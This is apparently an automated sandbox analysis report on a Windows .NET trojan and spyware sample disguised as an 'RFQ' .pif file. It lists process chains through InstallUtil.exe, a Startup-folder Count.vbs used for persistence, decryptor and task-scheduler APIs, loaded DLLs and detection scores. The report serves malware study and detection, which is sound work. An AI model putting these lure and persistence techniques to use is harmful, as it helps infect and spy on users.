Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F41D28	1_2_00F41D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F41D18	1_2_00F41D18
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_00B628B8	4_2_00B628B8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_00B62897	4_2_00B62897
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_00B62E43	4_2_00B62E43
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0551DCB0	4_2_0551DCB0
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0551EB78	4_2_0551EB78
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_060F7477	4_2_060F7477
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_060F8DDB	4_2_060F8DDB
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_060F50A8	4_2_060F50A8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_060F16E9	4_2_060F16E9
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_060F16F8	4_2_060F16F8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_060FD390	4_2_060FD390
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_060F5098	4_2_060F5098
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061D4610	4_2_061D4610
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061D0040	4_2_061D0040
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061D7F90	4_2_061D7F90
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061D0016	4_2_061D0016
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061D10F0	4_2_061D10F0
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061D10EE	4_2_061D10EE
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061D5C28	4_2_061D5C28
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061D4947	4_2_061D4947
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061E7350	4_2_061E7350
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061E7340	4_2_061E7340
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061E0027	4_2_061E0027
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061E0040	4_2_061E0040
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061E7841	4_2_061E7841
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061E609A	4_2_061E609A
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_061E60A0	4_2_061E60A0
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_063142A8	4_2_063142A8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06314298	4_2_06314298
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06314754	4_2_06314754
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_063121D8	4_2_063121D8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06339F28	4_2_06339F28
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0633EED1	4_2_0633EED1
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0633FC8D	4_2_0633FC8D
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06334558	4_2_06334558
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0633C3B0	4_2_0633C3B0
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0633C3A0	4_2_0633C3A0
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0633E3EA	4_2_0633E3EA
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0660EEC8	4_2_0660EEC8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_065F0040	4_2_065F0040
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_065F0006	4_2_065F0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_00E323D2	7_2_00E323D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_00E31D28	7_2_00E31D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_00E32148	7_2_00E32148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_00E32158	7_2_00E32158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_00E323D2	7_2_00E323D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_00E31D28	7_2_00E31D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_00E34D58	7_2_00E34D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_00E31D18	7_2_00E31D18

Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1793317354.00000000066A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameZlqgy.dll" vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1781499466.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1781499466.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOrkexnhsfu.exe" vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1787752415.000000000478E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1780114140.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1795094408.0000000006A60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000000.1641863659.0000000000932000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamepdp.exe( vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1787752415.0000000004617000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe	Binary or memory string: OriginalFilenamepdp.exe( vs RFQ-12202431_ACD_Group.pif.exe

Source: RFQ-12202431_ACD_Group.pif.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4949c40.7.raw.unpack, Oou6f20t2x6LiBYUPV.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4949c40.7.raw.unpack, YivfexVWZI1iWQ36XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4949c40.7.raw.unpack, YivfexVWZI1iWQ36XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.40ea5e8.1.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.40ea5e8.1.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.40ea5e8.1.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.40ea5e8.1.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.478e758.2.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.478e758.2.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.478e758.2.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.473e738.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.478e758.2.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.478e758.2.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.478e758.2.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.473e738.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.478e758.2.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.473e738.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.473e738.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.473e738.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.478e758.2.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.473e738.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/4@4/2

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\fc2a428e6332

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs"

Source: RFQ-12202431_ACD_Group.pif.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: RFQ-12202431_ACD_Group.pif.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RFQ-12202431_ACD_Group.pif.exe	Virustotal: Detection: 29%
Source: RFQ-12202431_ACD_Group.pif.exe	ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File read: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe "C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe"
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Count.exe "C:\Users\user\AppData\Roaming\Count.exe"
Source: C:\Users\user\AppData\Roaming\Count.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Count.exe "C:\Users\user\AppData\Roaming\Count.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: cryptbase.dll	Jump to behavior
